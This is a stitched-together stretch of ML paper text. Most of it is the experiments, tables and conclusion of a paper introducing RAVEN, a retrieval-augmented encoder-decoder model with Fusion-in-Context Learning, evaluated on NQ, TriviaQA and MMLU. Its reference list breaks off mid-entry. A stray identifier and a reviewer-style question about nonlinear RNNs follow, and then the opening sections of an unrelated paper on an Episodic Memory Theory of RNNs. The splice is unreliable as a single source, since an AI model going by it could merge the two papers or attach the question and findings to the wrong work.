3.2 EXPERIMENTAL SETUP We select two widely used datasets in the domain of open-domain question answering: Natural Questions (NQ) (Kwiatkowski et al., 2019) and TriviaQA (TQA) (Joshi et al., 2017). Following previous work (Izacard et al., 2022b), we employ the standard exact match (EM) metric. For the few-shot settings, following Brown et al. (2020), we evaluate each example in the test set with in-context examples obtained by randomly sampling \(k\) instances from the respective task's training set. Following Izacard et al. (2022b), we use an index built from the December 2018 Wikipedia dump for NQ and an index built from the December 2021 Wikipedia corpora for TriviaQA. We use the checkpoints released in the official repository,\(^4\) covering sizes of 11B (XXL), 3B (XL), and 770M (Large). We conduct experiments with various configurations detailed in the next section. 3.3 RESULTS & ANALYSIS 3.3.1 EFFECT OF PROMPTING STRATEGIES We first study the effectiveness of the prompting strategies described in §3.1. Table 1 summarizes the results. We find that ATLAS struggles to learn from in-context examples using strategy 2, as its few-shot performance is worse than its zero-shot performance. We hypothesize that this is because the model has difficulty learning the pattern of S2 with masked language modeling during its pretraining, since it is unlikely to obtain several consecutive question-answer pairs (or something similar) in the form of strategy 2 by randomly masking several spans in a sequence.
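For concreteness, a strategy-1 encoder input can be assembled as in the following sketch. The string format here is only illustrative; per the paper, the actual template follows Appendix B.3.

```python
def build_strategy1_prompt(examples, target_question, passage):
    """Assemble a strategy-1 encoder input: k demonstration QA pairs, the target
    question followed by a single sentinel, and a retrieved passage at the end."""
    parts = [f"Question: {q} Answer: {a}" for q, a in examples]
    parts.append(f"Question: {target_question} Answer: <extra_id_0>")
    return " ".join(parts) + f" {passage}"

# Example: a 2-shot encoder input
demos = [("Who wrote Hamlet?", "William Shakespeare"),
         ("What is the capital of France?", "Paris")]
enc_input = build_strategy1_prompt(
    demos, "Who painted the Mona Lisa?",
    "Leonardo da Vinci was an Italian polymath of the High Renaissance...")
```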
On the other hand, we observe that with strategy 1, the model does exhibit some in-context learning ability: the 5-shot and 8-shot performance is significantly better than the zero-shot performance on both NQ and TriviaQA. Therefore, we choose to focus on strategy 1 for further study and disregard strategy 2 for the remainder of the paper.\(^5\) 3.3.2 EFFECT OF NUMBER OF IN-CONTEXT EXAMPLES The number of in-context examples is a crucial hyperparameter for in-context learning. Generally, we expect better performance from a model with more in-context examples, but there is an upper limit due to 1) the maximum context length setup, e.g., 512 tokens, during the pretraining process, and 2) the point at which the model has received sufficient examples and cannot gain additional information from more examples. The optimal number of in-context examples also varies between models. For instance, on TriviaQA, PaLM (Chowdhery et al., 2022) exhibits better 1-shot performance than settings with more examples, while this is not the case for GPT-3 (Brown et al., 2020). Figure 2 illustrates the impact of varying the number of in-context examples across different ATLAS model sizes. Interestingly, the 11B model demonstrates poor performance in low-shot settings, e.g., 1-shot, but improves significantly from 4-shot and 5-shot onwards. Upon examining the generated responses, we find that the model tends to produce answers with more tokens in low-shot settings, while the ground truth typically consists of shorter answers with fewer than 5 tokens. By relaxing the criterion for a correct prediction to include instances where the ground-truth answer is a substring of the model output, we find that the 1-shot performance surpasses that of the 0-shot setting (38.3 vs 32.1 on NQ). --- \(^4\)https://github.com/facebookresearch/atlas \(^5\)We also study the effect of the target question's position in Appendix C.1. Figure 2: Results of ATLAS with different numbers of in-context examples. Figure 3: Results of ATLAS 11B with different numbers of retrieved passages. All models perform well in the 5-shot and 8-shot settings, but their performance does not continue to improve with more in-context examples (e.g., 16-shot). We believe this plateau may be attributed to two factors: 1) the sequence length constraints during ATLAS pretraining, where the maximum input length to the encoder is set to 384 tokens and the average input sequence length (excluding passages) is around 130 tokens; 2) the model's ability to learn adequately with 5 or 8 examples, making additional examples less beneficial. 3.3.3 EFFECT OF NUMBER OF RETRIEVED PASSAGES Figure 3 illustrates the impact of the number of retrieved passages on model performance. We observe that for both the 0-shot and 5-shot settings, the performance of the models increases significantly with the number of retrieved passages. This highlights the effectiveness of the Fusion-in-Decoder architecture (Izacard & Grave, 2021) for knowledge-intensive tasks like open-domain question answering, and underscores the importance of pretraining language models with retrieval augmentation. Additionally, the 5-shot performance consistently outperforms the 0-shot setting. This observation further emphasizes the value of providing in-context examples to improve the performance of retrieval-augmented encoder-decoder language models. 3.3.4 SUMMARY In summary, ATLAS exhibits a certain ability for in-context learning, which has been overlooked in previous studies.
However, there are also some limitations, such as unstable performance in low-shot settings and the fact that providing more in-context examples does not consistently improve performance. Moreover, retrieving more relevant passages significantly enhances performance, demonstrating the significance of pretraining language models with retrieval for knowledge-intensive tasks. This also highlights the superiority of the encoder-decoder (Fusion-in-Decoder) architecture, which offers an advantage not available to decoder-only language models. 4 METHODOLOGY In this section, we design methods to improve the models' zero-shot performance and in-context learning abilities based on the findings and analysis presented in §3. 4.1 RAVEN: COMBINING RETRIEVAL-AUGMENTED MASKED AND PREFIX LANGUAGE MODELING As described in §3, ATLAS is pretrained with a masked language modeling objective, where the input is a corrupted text with several masked spans placed randomly within the sequence (refer to Figure 1 (left) for an example). However, in testing, based on our analysis in §3.3.1 and §C.1, it is most effective to place the target question after all the in-context examples, with a masked token (i.e., `<extra_id_0>`) following the question (Figure 1, middle). Thus, there exists a mismatch between the pretraining and testing of ATLAS. To better align pretraining with testing, we propose to continually pretrain ATLAS with prefix language modeling (Liu et al., 2018; Raffel et al., 2020; Tay et al., 2023). Specifically, for each sequence, we mask 10% of the tokens on average at the end of the sequence with the `<extra_id_0>` token. Then, we use the retriever of ATLAS to retrieve relevant passages using the prefix and train the model to recover the suffix of the sequence, with the prefix and the passages as input. An example of input and output for prefix language modeling is shown in Figure 4. We can observe that this pretraining objective aligns much more closely with prompting strategy 1 in Figure 1. We refer to the model trained with additional prefix language modeling as RAVEN. Starting from the ATLAS checkpoint, which is based on masked language modeling, the training of RAVEN can be considered a combination of retrieval-augmented masked and prefix language modeling. This methodology shares certain aspects with the mixture objective of UL2 (Tay et al., 2023). However, there are key differences: 1) UL2 blends various language modeling objectives throughout its training process, while RAVEN applies the two objectives in sequential order; 2) unlike RAVEN, UL2 is trained without retrieval. Consequently, RAVEN benefits from both masked language modeling, which contributes to a better reader and retriever as evidenced in Izacard et al. (2022b), and prefix language modeling, which mitigates the gap between pretraining and testing. We verify the effectiveness of this design by exploring different training strategies in Appendix C.3. 4.2 FUSION-IN-CONTEXT LEARNING In §3.3.2, we observe that ATLAS's performance does not further improve with more than 8 in-context examples. One major reason for this is the limited sequence length during the pretraining process, which makes it difficult for the model to handle long sequences during testing. Pretraining models with longer contexts would be a straightforward approach to address this issue, but it would significantly increase computation cost and GPU memory requirements.
Additionally, the maximum input length is also constrained by the maximum sequence length of the retriever, i.e., Contriever, which is based on BERT (Devlin et al., 2019) and has a maximum length of 512 tokens. As an alternative, we propose an approach to enable models to learn from more in-context examples without modifying the model configuration or requiring additional training.

As described in §3, the reader of ATLAS (and RAVEN) is based on the Fusion-in-Decoder architecture (Izacard & Grave, 2021), where multiple passages are retrieved, and each passage, concatenated with the in-context examples and target question, is fed to the encoder separately (Figure 5 top). To allow the model to process more in-context examples without increasing the length of the input to the encoder, we can feed different in-context examples to the encoder with each passage (Figure 5 bottom). In this way, the model can incorporate more in-context examples during its inference process. We refer to this strategy as Fusion-in-Context Learning (FiCL).

In implementation, for a $k$-shot setting, such as a 64-shot setting, to effectively utilize the 64 examples, we randomly shuffle these examples and select $m$ (e.g., 5) examples in order as the input for the encoder each time. If all the examples have been used, we shuffle the 64 examples again. We denote the configuration of FiCL as $[k, m]$, which stands for [$k$-shot, $m$-fusion].

Table 2: Results of ATLAS and RAVEN on NQ and TriviaQA (exact match). Parentheses give the number of shots for the best few-shot result; bracketed values give the FiCL configuration [k-m].

| Model | Size | NQ 0-shot | NQ 1-shot | NQ few-shot | NQ FiCL | TQA 0-shot | TQA 1-shot | TQA few-shot | TQA FiCL |
|-------|------|-----------|-----------|-------------|---------|------------|------------|--------------|----------|
| ATLAS | 3B   | 23.7 | 25.1 | 28.4 (5) | 29.6 [64-3] | 54.3 | 55.5 | 61.1 (5) | 62.0 [64-5] |
| ATLAS | 11B  | 26.7 | 21.3 | 31.3 (8) | 32.0 [64-8] | 56.9 | 35.5 | 63.9 (8) | 64.9 [64-8] |
| RAVEN | 3B   | 29.3 | 31.7 | 31.4 (5) | 32.8 [40-1] | 62.4 | 63.2 | 62.6 (5) | 63.6 [40-1] |
| RAVEN | 11B  | 29.6 | 31.4 | 32.7 (5) | 33.5 [64-5] | 65.7 | 66.2 | 66.7 (5) | 67.3 [64-5] |

### 4.3 In-Context Example Retrieval

In recent studies (Liu et al., 2022; Rubin et al., 2022; Su et al., 2023), it has been demonstrated that a well-chosen selection of in-context examples can enhance in-context learning. Building on this insight, we propose utilizing the retriever of RAVEN to retrieve in-context examples. Specifically, we use RAVEN's retriever to build an index during the preparation step; then, during testing, when the model receives an input, it can efficiently retrieve in-context examples with its retriever. By integrating RAVEN's retriever in this manner, we aim to: 1) automate in-context learning, which is particularly practical for model owners who have a database of examples (without this, users would need to manually provide in-context examples); and 2) optimize the selection of in-context examples, thereby enhancing in-context learning and improving overall performance.

## 5 Experiments

### 5.1 Experimental Setup

**Datasets.** Following §3.2, we first evaluate on two widely-used open-domain question answering datasets: Natural Questions (Kwiatkowski et al., 2019) and TriviaQA (Joshi et al., 2017). Additionally, we conduct a case study on long-form question answering using the ELI5 dataset (Fan et al., 2019). Furthermore, we assess the models' language understanding ability using the Massive Multitask Language Understanding (MMLU) benchmark (Hendrycks et al., 2021). Detailed information regarding the MMLU evaluation is in Appendix B.4.
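For the QA datasets, predictions are scored with exact match (EM). A minimal scorer, in our own sketch, is shown below; the answer normalization follows the standard open-domain QA convention (lower-casing, stripping punctuation and articles), which we assume rather than quote from the paper, and the relaxed substring variant mirrors the analysis of §3.3.2:

```python
import re
import string

def normalize(text):
    """Standard QA normalization: lower-case, drop punctuation and articles."""
    text = text.lower()
    text = "".join(ch for ch in text if ch not in set(string.punctuation))
    text = re.sub(r"\b(a|an|the)\b", " ", text)
    return " ".join(text.split())

def exact_match(prediction, answers):
    return float(any(normalize(prediction) == normalize(a) for a in answers))

def relaxed_match(prediction, answers):
    """Relaxed criterion from Section 3.3.2: correct if a ground-truth
    answer appears as a substring of the (normalized) model output."""
    pred = normalize(prediction)
    return float(any(normalize(a) in pred for a in answers))
```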
Other evaluation settings are the same as §3.2.

**Baselines.** Since RAVEN is built upon ATLAS, we choose ATLAS as a primary baseline for comparison. We also compare our model with decoder-only large language models such as GPT-3 (Brown et al., 2020) and PaLM (Chowdhery et al., 2022) (in a closed-book setting). Additionally, for open-domain QA, we evaluate our approach against REPLUG (Shi et al., 2023) and RETRO (Borgeaud et al., 2022), as well as its improved version RETRO++ (Wang et al., 2023). These models are decoder-only language models augmented with retrieval. REPLUG is based on Codex (Chen et al., 2021) and Contriever (Izacard et al., 2022a), where the passages are retrieved by Contriever (using ensemble and additional adaptation) and fed directly to Codex. RETRO is a GPT model (Radford et al., 2019) augmented with a transformer encoder to encode the retrieved passages. RETRO++ is a variant of RETRO that feeds the most relevant retrieved passage into the GPT decoder while providing other passages to its encoder. For MMLU, we also include FLAN-T5 (Chung et al., 2022), an enhanced version of T5 that has been trained on a large mixture of tasks with instruction finetuning.\(^6\)

### 5.2 Open-Domain Question Answering

We choose open-domain QA as our primary evaluation task, as it effectively represents knowledge-intensive challenges and is widely employed in real-world applications.

\(^6\)Implementation details are described in Appendix B.1.

Figure 6: RAVEN vs ATLAS.

Table 3: Results on NQ and TriviaQA in comparison to the baselines. Dashes indicate settings not reported; bracketed values give the FiCL configuration [k-m].

| Model | Size | NQ 0-shot | NQ 1-shot | NQ few-shot | TQA 0-shot | TQA 1-shot | TQA few-shot |
|------------------|------|------|------|-----------|------|------|-----------|
| GPT-3            | 13B  | 7.8  | 13.7 | 21.0 (64) | 41.8 | 51.3 | 57.5 (64) |
| GPT-3            | 175B | 14.6 | 23.0 | 29.9 (64) | 64.3 | 68.0 | 71.2 (64) |
| PaLM             | 8B   | 8.4  | 10.6 | 14.6 (5)  | 39.5 | 48.5 | 47.2 (5)  |
| PaLM             | 62B  | 18.1 | 23.1 | 27.6 (5)  | 67.3 | 72.7 | 70.1 (5)  |
| PaLM             | 540B | 21.2 | 29.3 | 39.6 (64) | 76.9 | 81.4 | 81.4 (1)* |
| Codex            | 175B | –    | –    | 40.6 (16) | –    | –    | 73.6 (16) |
| LLaMA            | 7B   | 16.8 | 18.7 | 26.1 (64) | 50.0 | 53.4 | 57.6 (64) |
| Codex + Contriever | 175B | –  | –    | 44.2 (16) | –    | –    | 76.0 (16) |
| Codex + RePlug   | 175B | –    | –    | 44.7 (16) | –    | –    | 76.8 (16) |
| Codex + RePlug LSR | 175B | –  | –    | 45.5 (16) | –    | –    | 77.3 (16) |
| RETRO            | 9.5B | 8.9  | –    | –         | 36.0 | –    | –         |
| RETRO++          | 9.5B | 25.8 | –    | –         | 48.3 | –    | –         |
| RAVEN            | 3B   | 29.3 | 31.7 | 31.4 (5)  | 62.4 | 63.2 | 62.6 (5)  |
| RAVEN + FiCL     | 3B   | –    | –    | 32.8 [40-1] | –  | –    | 63.6 [40-1] |
| RAVEN            | 11B  | 29.6 | 31.4 | 32.7 (5)  | 65.7 | 66.2 | 66.7 (5)  |
| RAVEN + FiCL     | 11B  | –    | –    | 33.5 [64-5] | –  | –    | 67.3 [64-5] |

\* For TriviaQA, PaLM's 1-shot performance surpasses other settings. We follow the original paper to report the 1-shot result. For other models, we select the best $k$-shot ($k \in \{2, 3, 4, 5, 8, 16\}$) performance or report the number in the original paper.

**RAVEN vs ATLAS.** Table 2 and Figure 6 present the exact match (EM) scores for ATLAS and RAVEN on the NQ and TriviaQA datasets. As shown in Table 2, both the 3B and 11B RAVEN models significantly outperform ATLAS. For instance, on TriviaQA, RAVEN 11B achieves an improvement of 8.8%, 30.7%, and 2.8% in the 0-shot, 1-shot, and few-shot settings respectively, compared to ATLAS 11B.
Furthermore, as illustrated in Figure 6, the performance of RAVEN increases steadily with the number of in-context examples, while the performance of ATLAS experiences a substantial decline in low-shot settings. These results demonstrate the effectiveness of RAVEN across various shot settings.

**Fusion-in-Context Learning.** We also report the results of models with Fusion-in-Context Learning (FiCL) in Table 2. For both ATLAS and RAVEN, FiCL contributes to approximately a 1% improvement, which is not attainable by standard in-context learning, where performance does not further improve (or even decreases) with more than 8 in-context examples. This demonstrates the superiority of FiCL for enabling models to learn from more examples.

**Comparison to SOTA.** In Table 3, we compare RAVEN to other baselines. On NQ, RAVEN's zero-shot and one-shot performance surpasses all the baselines, including PaLM, even though RAVEN 3B has 180 times fewer parameters than PaLM 540B. The zero-shot performance of RAVEN on TriviaQA is also on par with PaLM 62B. Furthermore, RAVEN's zero-shot performance significantly exceeds that of both RETRO and RETRO++, which are models of a similar scale. In the few-shot setting, with FiCL, RAVEN achieves performance comparable to GPT-3 175B and PaLM 62B. However, there remains a gap between RAVEN and the larger PaLM 540B and Codex 175B models. Nevertheless, given the considerably smaller scale of RAVEN in comparison to PaLM and Codex, its performance can be considered impressive. The performance of RAVEN may be further improved if it is built upon a larger model, in which case its few-shot performance is likely to surpass that of PaLM and Codex.

**In-Context Example Retrieval.** §4.3 suggests using RAVEN's retriever for in-context example retrieval. Results in Table 4 show that this approach improves RAVEN's few-shot results, especially on NQ, where a ~10% improvement is observed. This indicates the significant positive impact of incorporating more relevant in-context examples.

**Additional Results.** We examine the effect of the number of retrieved documents in Appendix C.2, conduct an ablation study of different training strategies in Appendix C.3, and provide a case study on long-form question answering in Appendix C.4.

### 5.3 MMLU

Table 5 summarizes the results (accuracy) on Massive Multitask Language Understanding (MMLU). We find that the zero-shot performance of RAVEN is impressive, surpassing the few-shot performance of GPT-3 175B and being only slightly worse than PaLM 62B, despite RAVEN having a significantly smaller number of parameters. Furthermore, with the same number of parameters, the performance of RAVEN is far superior to T5. Additionally, even without instruction finetuning, RAVEN achieves performance comparable to FLAN-T5, a model finetuned on a large collection of tasks. We expect further improvement of RAVEN from applying instruction tuning as well, and leave it for future study.

Interestingly, with standard in-context learning, the few-shot performance of RAVEN is worse than zero-shot, possibly due to the longer questions and answer options in MMLU causing context length issues in the 5-shot setting. Also, in the one-shot setting, since MMLU is a multiple-choice QA task, providing only one example might introduce bias in the model's prediction, favoring a specific option.
However, with Fusion-in-Context Learning, the performance improves significantly, leading to better few-shot performance for the 11B model compared to its zero-shot performance, further demonstrating the effectiveness of FiCL.

### 6 CONCLUSION

In this study, we have delved into the in-context learning ability of retrieval-augmented encoder-decoder language models. We commenced with a comprehensive analysis of the state-of-the-art ATLAS model and subsequently developed our model based on the analysis. Our extensive experimental results demonstrated that our model significantly outperforms ATLAS and achieves results on par with some of the most advanced language models, even with substantially fewer parameters. These findings highlight the potential of retrieval-augmented encoder-decoder language models in the realm of in-context learning. Although we started with ATLAS, the insights and proposed methods are transferable and can potentially enhance other models, such as domain-specialized or more powerful ones. The training strategy of RAVEN and the idea of FiCL are simple yet effective, and would not have been conceived without our analytical groundwork. Future work focusing on scaling up the model, applying these methods, and further studying its in-context learning ability is encouraged.

Table 4: Gains (EM) on NQ and TriviaQA (TQA) from retrieving in-context examples with RAVEN's retriever (§4.3).

| Size | NQ 1-shot | NQ 5-shot | TQA 1-shot | TQA 5-shot |
|------|-----------|-----------|------------|------------|
| 3B   | +9.1      | +11.6     | +0.0       | +1.6       |
| 11B  | +9.8      | +11.1     | -0.5       | +1.0       |

Table 5: Results (accuracy) on MMLU. Dashes indicate settings not reported; bracketed values give the FiCL configuration [k-m].

| Model   | Size | 0-shot | 1-shot | 5-shot | FiCL        |
|---------|------|--------|--------|--------|-------------|
| GPT-3   | 13B  | –      | –      | 26.0   | –           |
| GPT-3   | 175B | –      | –      | 43.9   | –           |
| PaLM    | 8B   | –      | –      | 25.3   | –           |
| PaLM    | 62B  | –      | –      | 53.7   | –           |
| PaLM    | 540B | –      | –      | 69.3   | –           |
| T5      | 3B   | –      | –      | 25.7   | –           |
| T5      | 11B  | –      | –      | 25.9   | –           |
| FLAN-T5 | 3B   | –      | –      | 52.4   | –           |
| FLAN-T5 | 11B  | –      | –      | 55.1   | –           |
| ATLAS   | 3B   | 43.7   | 36.9   | 38.5   | 42.6 [40-1] |
| ATLAS   | 11B  | 47.4   | 45.3   | 44.2   | 48.0 [40-1] |
| RAVEN   | 3B   | 45.7   | 40.0   | 40.4   | 44.5 [64-5] |
| RAVEN   | 11B  | 48.9   | 49.2   | 48.7   | 50.5 [40-1] |

REPRODUCIBILITY STATEMENT

We have detailed the hyperparameter setup and configurations in Appendix B.1. The checkpoints for the ATLAS and T5 models used in our experiments are publicly available at https://github.com/facebookresearch/atlas and https://huggingface.co/google/t5-xl-lm-adapter respectively. The exact input prompts for both pretraining and testing are included in Appendix B. The full code and model checkpoints will be made publicly available after the review process.

REFERENCES

Sebastian Borgeaud, Arthur Mensch, Jordan Hoffmann, Trevor Cai, Eliza Rutherford, Katie Millican, George Bm Van Den Driessche, Jean-Baptiste Lespiau, Bogdan Damoc, Aidan Clark, Diego De Las Casas, Aurelia Guy, Jacob Menick, Roman Ring, Tom Hennigan, Saffron Huang, Loren Maggiore, Chris Jones, Albin Cassirer, Andy Brock, Michela Paganini, Geoffrey Irving, Oriol Vinyals, Simon Osindero, Karen Simonyan, Jack Rae, Erich Elsen, and Laurent Sifre. Improving language models by retrieving from trillions of tokens. In Kamalika Chaudhuri, Stefanie Jegelka, Le Song, Csaba Szepesvari, Gang Niu, and Sivan Sabato (eds.), Proceedings of the 39th International Conference on Machine Learning, volume 162 of Proceedings of Machine Learning Research, pp. 2206–2240. PMLR, 17–23 Jul 2022.
URL https://proceedings.mlr.press/v162/borgeaud22a.html.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel Ziegler, Jeffrey Wu, Clemens Winter, Chris Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. Language models are few-shot learners. In H. Larochelle, M. Ranzato, R. Hadsell, M.F. Balcan, and H. Lin (eds.), Advances in Neural Information Processing Systems, volume 33, pp. 1877–1901. Curran Associates, Inc., 2020. URL https://proceedings.neurips.cc/paper_files/paper/2020/file/1457c0d6bfc84967418bfb8ac142f64a-Paper.pdf.

Sébastien Bubeck, Varun Chandrasekaran, Ronen Eldan, Johannes Gehrke, Eric Horvitz, Ece Kamar, Peter Lee, Yin Tat Lee, Yuanzhi Li, Scott Lundberg, et al. Sparks of artificial general intelligence: Early experiments with GPT-4. arXiv preprint arXiv:2303.12712, 2023.

Danqi Chen, Adam Fisch, Jason Weston, and Antoine Bordes. Reading Wikipedia to answer open-domain questions. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 1870–1879, Vancouver, Canada, July 2017. Association for Computational Linguistics. doi: 10.18653/v1/P17-1171. URL https://aclanthology.org/P17-1171.

Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. arXiv preprint arXiv:2107.03374, 2021. URL https://arxiv.org/abs/2107.03374.

Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. PaLM: Scaling language modeling with pathways. arXiv preprint arXiv:2204.02311, 2022. URL https://arxiv.org/abs/2204.02311.

Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Eric Li, Xuezhi Wang, Mostafa Dehghani, Siddhartha Brahma, et al. Scaling instruction-finetuned language models. arXiv preprint arXiv:2210.11416, 2022. URL https://arxiv.org/abs/2210.11416.

Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pp. 4171–4186, Minneapolis, Minnesota, June 2019. Association for Computational Linguistics.
HEcbGXzIHK
* Could you please discuss in detail the difficulties of applying the proposed theory to nonlinear RNNs? In Appendix A.4, you have shown that a nonlinear RNN admits a linear-system form similar to that of linear RNNs, albeit with a different $W_{hh}$.
Episodic Memory Theory for the Mechanistic Interpretation of Recurrent Neural Networks

Anonymous authors
Paper under double-blind review

Abstract

Understanding the intricate operations of Recurrent Neural Networks (RNNs) mechanistically is pivotal for advancing their capabilities and applications. In this pursuit, we propose the Episodic Memory Theory (EMT), illustrating that RNNs can be conceptualized as discrete-time analogs of the recently proposed General Sequential Episodic Memory Model. To substantiate EMT, we introduce a novel set of algorithmic tasks tailored to probe the variable binding behavior in RNNs. Utilizing the EMT, we formulate a mathematically rigorous circuit that facilitates variable binding in these tasks. Our empirical investigations reveal that trained RNNs consistently converge to the variable binding circuit, indicating universality in the learned dynamics of RNNs. Building on these findings, we devise an algorithm to define a privileged basis, which reveals latent neurons instrumental in the temporal storage and composition of variables — a mechanism vital for the successful generalization in these tasks. We show that the privileged basis enhances the interpretability of the learned parameters and hidden states of RNNs. Our work represents a step toward demystifying the internal mechanisms of RNNs and, for computational neuroscience, serves to bridge the gap between artificial neural networks and neural memory models.

1 Introduction

AI-driven systems have become ubiquitous in real-world applications (Christian, 2021; Sears, 2021; Bostrom, 2014; Müller & Bostrom, 2013). While these systems demonstrate remarkable proficiency, their inherently black-box nature often renders them inscrutable (Alishahi et al., 2019; Buhrmester et al., 2019; Fong & Vedaldi, 2017). Mechanistic interpretability aims to reverse engineer the intricate workings of neural networks that drive their behavior (Olah, 2022). Gaining a mechanistic understanding builds trust in AI systems and provides insights that can lead to refinement and innovation (Raukur et al., 2022). In essence, mechanistic interpretability is not just about demystifying AI; it's about harnessing its potential responsibly and efficiently.

Recurrent Neural Networks (RNNs) (Hochreiter & Schmidhuber, 1997) play a pivotal role in AI due to their unique ability to process sequential data (Graves et al., 2013), making them indispensable for tasks involving time series analysis, natural language processing, and other applications where understanding temporal dynamics is crucial (Che et al., 2018). One major challenge in understanding RNNs mechanistically is that the task-relevant information is stored in a hidden state that evolves over time. This temporal nature of RNNs raises critical questions: How is information reliably stored and processed in this evolving hidden state? And how are the learned parameters of RNNs connected to the computations performed? Addressing these questions is vital for advancing our understanding and application of RNNs in AI-driven systems.

Answering these questions in RNNs requires elucidating the mechanisms of 'variable binding' that enable them to dynamically associate information with variables and manipulate the information symbolically over time (Marcus, 2001). In cognitive systems, variable binding enables generalization in complex, structured tasks that involve symbolic relationships and dependencies between various elements (Greff et al., 2020).
For instance, in natural language processing, variable binding promotes understanding and maintaining context over a sentence or a conversation. The importance of uncovering the variable binding mechanisms stems from its potential to bridge the gap between simple pattern recognition and advanced cognitive capabilities, and to move towards a better understanding and reasoning of AI systems. This will not only enhance the capabilities of AI systems but also provide deeper insights into the nature of intelligence itself - both artificial and biological.

**Organization:** To formulate variable binding mechanisms in RNNs, we turn to computational neuroscience, drawing parallels between autonomously evolving RNNs and episodic memory retrieval models. First, we show the connection between RNN architectures and a recently proposed episodic memory model - the General Sequential Episodic Memory Model (GSEMM) - in Section 3. We show that while GSEMM was introduced in continuous time, its temporal discretization corresponds with the evolution of RNNs. Episodic memory has varied definitions in different fields. Our definition of episodic memory is in line with the General Sequential Episodic Memory Model (Karuvally et al., 2022) and neuroscience (Umbach et al., 2020), which describes the ability of neural networks to store and process temporal and contiguous memory sequences. This contrasts with the psychological perspective of episodic memory as the subjective recollection of personal experiences (Tulving, 1972), where the focus is on the human recollecting the memory rather than the underlying system.

In Section 4, we develop a class of algorithmic tasks designed to investigate the variable binding mechanisms of RNNs. These tasks involve a two-phase process: in the input phase, an RNN is presented with a series of $d$-dimensional vectors over $s$ timesteps, and in the output phase, it autonomously generates outputs based on this stored information, using a linear binary symbolic composition function. The tasks, while simpler than complex real-world scenarios, build upon and extend previous task setups that explore RNN memory capabilities (Graves et al., 2014).

Section 5 introduces the concept of *variable memories*—linear subspaces within the RNN that facilitate the variable binding and recursive composition of information. This concept allows us to fully deconstruct the mechanisms of variable binding in RNNs and propose a circuit mechanism answering how RNNs store and process information over time. Our experimental findings demonstrate a consistent convergence to the proposed circuit, contributing evidence to the 'universality hypothesis' in mechanistic interpretability (Olah et al., 2020; Li et al., 2015a). Further, the circuit mechanisms we found show notable similarities to recently developed brain-inspired traveling waves in RNNs (Keller et al., 2023), indicating a broader applicability of the theory beyond the toy variable binding tasks.

In Section 6, we leverage the empirical convergence result to propose an algorithm to construct a privileged basis of the *variable memories*. In our results, we show that this basis fully deconstructs the learned behavior by uncovering *latent neurons* (by basis change of the RNN hidden state) and *latent synaptic interactions* (by basis change of the learned interactions) involved in information processing.
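As a preview of the task structure analyzed in Section 4, the following sketch generates one variable-binding episode. This is our illustration, not the authors' code: the `make_task_instance` helper, the RepeatCopy default for $f$, and the `sign()` clamp to the binary codomain are our assumptions.

```python
import numpy as np

def make_task_instance(d, s, T_out, f=None, rng=None):
    """Generate one variable-binding episode (input phase + output phase).

    Input phase: s random vectors in {-1, +1}^d, one per timestep.
    Output phase: T_out autonomous steps produced by the composition f
    applied to the previous s outputs.
    """
    rng = rng or np.random.default_rng(0)
    u = rng.choice([-1.0, 1.0], size=(s, d))    # input-phase vectors
    if f is None:
        f = lambda history: history[-s]         # RepeatCopy: y(t) = y(t - s)
    y = [row for row in u]                      # y(t) = u(t) for 0 < t <= s
    for _ in range(T_out):                      # autonomous output phase
        y.append(np.sign(f(y)))                 # keep outputs in {-1, +1}
    return u, np.stack(y[s:])

inputs, targets = make_task_instance(d=5, s=4, T_out=12)
```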
## 2 RELATED WORKS

Our exploration of RNNs spans three, often separate, research directions - the dynamical systems interpretation of RNNs, mechanistic interpretability, and neural memory models.

**Dynamical Systems Interpretation of RNNs:** Current approaches to interpret RNNs consider them as non-linear dynamical systems and apply linearization around fixed or slow-changing points to reveal their behavior (Marschall & Savin, 2023; Sussillo & Barak, 2013). The preliminary step in this analysis involves linearization around fixed points and slow-changing points found using optimization algorithms. The phase space flow is assembled piecemeal from each linearized region. The exploration of the long-term behavior of these regions is undertaken through the eigen-spectrum analysis of the corresponding linearized dynamical systems (Strogatz, 1994), providing insights into the dynamics of convergence, divergence, stability, or spiraling (Rowley et al., 2009; Kim, 1996). However, this method becomes intractable in our variable binding tasks when there are many dimensions exhibiting non-convergent behaviors. The proposed EMT generalizes this approach to the class of variable binding tasks and enables interpretation even when the number of non-converging dimensions is arbitrarily large (Appendix Figure 5).

Figure 1: Equivalence between Episodic Memory Models and Variable Binding. A. Episodic Memory models aim to uncover the cognitive processes involved in the retrieval of subjective past experiences, often stored as a temporal sequence of memory items. The illustration shows the retrieval of a personal experience when an apple is observed. B. The illustration shows the application of the Episodic Memory Theory, which poses that learning the addition operation over arbitrary numbers to generate Fibonacci numbers, a task involving variable binding, can be considered equivalent to episodic memory retrieval where the computations are performed over variables instead of predetermined memories. The abstract addition operation is stored in the synapses in the form of how the variables interact with each other to produce the desired result (see Appendix A.3 for details).

